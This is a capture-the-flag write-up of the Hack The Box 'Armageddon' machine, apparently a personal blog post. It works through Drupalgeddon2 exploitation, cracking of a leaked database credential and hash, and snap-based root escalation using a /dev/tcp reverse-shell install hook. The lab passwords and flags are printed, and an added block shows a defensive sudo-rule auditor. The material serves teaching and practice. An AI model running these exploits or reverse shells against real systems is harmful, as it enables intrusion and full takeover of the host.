Armageddon-htb-writeup

0x00 Skills Covered

Skills in this chapter: Drupalgeddon2 exploitation, MySQL database password leak, sudo snap privilege escalation

Reference: https://medium.com/@joemcfarland/hack-the-box-armageddon-writeup-4f94be2b3485

Reference: https://khaoticdev.net/hack-the-box-armageddon/

Reference: https://otrashoui.xyz/armageddon/

0x01 Getting User Access

1. Get the target IP address: 10.10.10.233

2. Enumerate the open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.233
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 13:10 CST
Warning: 10.10.10.233 giving up on port because retransmission cap hit (10).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.233
Host is up (0.41s latency).
Not shown: 52521 filtered tcp ports (no-response), 13012 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 91.60 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -T4 --min-rate=5000 10.10.10.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 13:12 CST
Nmap scan report for 10.10.10.233
Host is up (0.39s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Armageddon | Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.39 seconds

3. Wappalyzer identifies the site as a Drupal 7 CMS

4. The CHANGELOG.txt file reveals the exact version in use

http://10.10.10.233/CHANGELOG.txt

5. Searching for this version turns up several RCE vulnerabilities
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Drupal 7.56
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

6. Use Metasploit directly
┌──(kali㉿kali)-[~/桌面]
└─$ msfconsole
Metasploit tip: Metasploit can be configured at startup, see msfconsole
--help to learn more
msf6 > search 'Drupalgeddon2' Remote Code Execution
[-] No results from search
msf6 > search Drupalgeddon2

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.230.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)

View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233
RHOSTS => 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.233:36606) at 2023-12-24 13:28:09 +0800

meterpreter > shell
Process 2385 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

7. But when we look at the home directory, we find our privileges are very limited
ls
CHANGELOG.txt
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
pwd
/var/www/html
ls -la /home
ls: cannot open directory /home: Permission denied

8. Browsing the configuration files under the web root reveals the database password
ls -la
total 284
drwxr-xr-x. 9 apache apache 4096 Dec 14 2020 .
drwxr-xr-x. 4 root root 33 Dec 3 2020 ..
-rw-r--r--. 1 apache apache 317 Jun 21 2017 .editorconfig
-rw-r--r--. 1 apache apache 174 Jun 21 2017 .gitignore
-rw-r--r--. 1 apache apache 6112 Jun 21 2017 .htaccess
-rw-r--r--. 1 apache apache 111613 Jun 21 2017 CHANGELOG.txt
-rw-r--r--. 1 apache apache 1481 Jun 21 2017 COPYRIGHT.txt
-rw-r--r--. 1 apache apache 1717 Jun 21 2017 INSTALL.mysql.txt
-rw-r--r--. 1 apache apache 1874 Jun 21 2017 INSTALL.pgsql.txt
-rw-r--r--. 1 apache apache 1298 Jun 21 2017 INSTALL.sqlite.txt
-rw-r--r--. 1 apache apache 17995 Jun 21 2017 INSTALL.txt
-rw-r--r--. 1 apache apache 18092 Nov 16 2016 LICENSE.txt
-rw-r--r--. 1 apache apache 8710 Jun 21 2017 MAINTAINERS.txt
-rw-r--r--. 1 apache apache 5382 Jun 21 2017 README.txt
-rw-r--r--. 1 apache apache 10123 Jun 21 2017 UPGRADE.txt
-rw-r--r--. 1 apache apache 6604 Jun 21 2017 authorize.php
-rw-r--r--. 1 apache apache 720 Jun 21 2017 cron.php
drwxr-xr-x. 4 apache apache 4096 Jun 21 2017 includes
-rw-r--r--. 1 apache apache 529 Jun 21 2017 index.php
-rw-r--r--. 1 apache apache 703 Jun 21 2017 install.php
drwxr-xr-x. 4 apache apache 4096 Dec 4 2020 misc
drwxr-xr-x. 42 apache apache 4096 Jun 21 2017 modules
drwxr-xr-x. 5 apache apache 70 Jun 21 2017 profiles
-rw-r--r--. 1 apache apache 2189 Jun 21 2017 robots.txt
drwxr-xr-x. 2 apache apache 261 Jun 21 2017 scripts
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 sites
drwxr-xr-x. 7 apache apache 94 Jun 21 2017 themes
-rw-r--r--. 1 apache apache 19986 Jun 21 2017 update.php
-rw-r--r--. 1 apache apache 2200 Jun 21 2017 web.config
-rw-r--r--. 1 apache apache 417 Jun 21 2017 xmlrpc.php
cd sites
ls -la
total 12
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 .
drwxr-xr-x. 9 apache apache 4096 Dec 14 2020 ..
-rw-r--r--. 1 apache apache 904 Jun 21 2017 README.txt
drwxr-xr-x. 5 apache apache 52 Jun 21 2017 all
dr-xr-xr-x. 3 apache apache 67 Dec 3 2020 default
-rw-r--r--. 1 apache apache 2365 Jun 21 2017 example.sites.php
cd default
ls -la
total 56
dr-xr-xr-x. 3 apache apache 67 Dec 3 2020 .
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 ..
-rw-r--r--. 1 apache apache 26250 Jun 21 2017 default.settings.php
drwxrwxr-x. 3 apache apache 37 Dec 3 2020 files
-r--r--r--. 1 apache apache 26565 Dec 3 2020 settings.php
cat setting.php
cat: setting.php: No such file or directory
cat settings.php
<?php
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
# $conf['allow_css_double_underscores'] = TRUE;

9. Then query the MySQL database, which gives us a user's account name and password hash
mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -e 'show databases'
Database
information_schema
drupal
mysql
performance_schema

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'show tables'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'describe users'
Field Type Null Key Default Extra
uid int(10) unsigned NO PRI 0
name varchar(60) NO UNI
pass varchar(128) NO
mail varchar(254) YES MUL
theme varchar(255) NO
signature varchar(255) NO
signature_format varchar(255) YES NULL
created int(11) NO MUL 0
access int(11) NO MUL 0
login int(11) NO 0
status tinyint(4) NO 0
timezone varchar(32) YES NULL
language varchar(12) NO
picture int(11) NO MUL 0
init varchar(254) YES
data longblob YES NULL

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'select uid,name,pass,login from users'
uid name pass login
0 0
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt 1607076276

10. Crack the password with john
┌──(kali㉿kali)-[~/桌面]
└─$ touch hash

┌──(kali㉿kali)-[~/桌面]
└─$ echo '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' > hash

┌──(kali㉿kali)-[~/桌面]
└─$ cat hash
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
1g 0:00:00:00 DONE (2023-12-24 13:43) 1.639g/s 472.1p/s 472.1c/s 472.1C/s alyssa..brenda
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

11. Log in with these credentials to get the initial foothold and the user flag
┌──(kali㉿kali)-[~/桌面]
└─$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password:
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$
[brucetherealadmin@armageddon ~]$ pwd
/home/brucetherealadmin
[brucetherealadmin@armageddon ~]$ ls -la
总用量 16
drwx------. 2 brucetherealadmin brucetherealadmin 99 12月 14 2020 .
drwxr-xr-x. 3 root root 31 12月 3 2020 ..
lrwxrwxrwx. 1 root root 9 12月 11 2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 4月 1 2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 4月 1 2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 4月 1 2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin 33 12月 24 05:04 user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
3e12791d3ad83a22fdae991fde3fa5ac
[brucetherealadmin@armageddon ~]$

0x02 Getting Root

12. Checking sudo -l reveals the privilege escalation path
[brucetherealadmin@armageddon ~]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 brucetherealadmin 可以在 armageddon 上运行以下命令:
(root) NOPASSWD: /usr/bin/snap install *
[brucetherealadmin@armageddon ~]$
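An added example (not part of the original writeup) of the check a system reviewer would run over `sudo -l` output: it parses each rule line, and flags the combination that makes this rule exploitable, namely no password, a wildcard argument, and a package manager that runs package-supplied hooks as root. The sample text is constructed from the rule line above plus one benign rule; the function name and the installer list are my own.

```python
import re
import shlex

# One rule line of `sudo -l` output looks like "(runas) TAG: TAG: /path/to/command args".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Package managers whose install step executes scripts or hooks shipped inside the package.
PACKAGE_INSTALLERS = {"snap", "apt", "apt-get", "dpkg", "yum", "dnf", "rpm", "pip", "gem", "npm"}

def audit_sudo_rules(sudo_l_output: str) -> list:
    """Return one finding per rule line; 'critical' means all three risk flags are present."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header and "Matching Defaults" lines are not rules
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        argv = shlex.split(m.group("cmd"))
        binary = argv[0].rsplit("/", 1)[-1]
        flags = []
        if "NOPASSWD" in tags:
            flags.append("no password required")
        if any(ch in arg for arg in argv[1:] for ch in "*?["):
            flags.append("wildcard argument: the caller chooses part of the command line")
        if binary in PACKAGE_INSTALLERS:
            flags.append(f"{binary} runs package-supplied hooks as root")
        findings.append({"runas": m.group("runas"), "command": m.group("cmd"),
                         "flags": flags, "critical": len(flags) == 3})
    return findings

# Constructed sample: the rule from the target above, plus a benign rule for contrast.
SAMPLE = """\
User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
    (root) /usr/sbin/service httpd restart
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE):
        print("CRITICAL" if f["critical"] else "review", f["command"], f["flags"])
```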

13. GTFOBins gives the escalation method, but a snap package has to be built locally first

https://gtfobins.github.io/gtfobins/snap/
COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

14. Build the package locally
┌──(kali㉿kali)-[~/桌面]
└─$ sudo apt install snapd

┌──(kali㉿kali)-[~/桌面]
└─$ sudo gem install --no-document fpm

┌──(kali㉿kali)-[~/桌面]
└─$ mkdir -p snap/meta/hooks

┌──(kali㉿kali)-[~/桌面]
└─$ cd snap

┌──(kali㉿kali)-[~/桌面/snap]
└─$ cmd="bash -c 'bash -i >& /dev/tcp/10.10.14.2/10086 0>&1'"

┌──(kali㉿kali)-[~/桌面/snap]
└─$ printf '#!/bin/sh\n%s ; false' "$cmd" > meta/hooks/install

┌──(kali㉿kali)-[~/桌面/snap]
└─$ chmod +x meta/hooks/install

┌──(kali㉿kali)-[~/桌面/snap]
└─$ fpm -n gibshellplz -s dir -t snap -a all meta
Created package {:path=>"gibshellplz_1.0_all.snap"}

┌──(kali㉿kali)-[~/桌面]
└─$ scp -r ./gibshellplz_1.0_all.snap brucetherealadmin@10.10.10.233:/tmp
brucetherealadmin@10.10.10.233's password:
gibshellplz_1.0_all.snap 100% 4096 6.1KB/s 00:00

15. Install the package on the target and get the root flag
[brucetherealadmin@armageddon ~]$ cd /tmp
[brucetherealadmin@armageddon tmp]$ ls
gibshellplz_1.0_all.snap
[brucetherealadmin@armageddon tmp]$ sudo snap install gibshellplz_1.0_all.snap --dangerous --devmode

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.233] 53286
bash: cannot set terminal process group (3172): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
bash-4.3# cat /root/root.txt
cat /root/root.txt
8bb4322f36c2e554f3fde22a03f9f5da
bash-4.3#

0x03 Completion Proof

https://www.hackthebox.com/achievement/machine/1705469/323


Source: https://sh1yan.top/2023/12/24/Armageddon-htb-writeup/
Author: shiyan
Published: December 24, 2023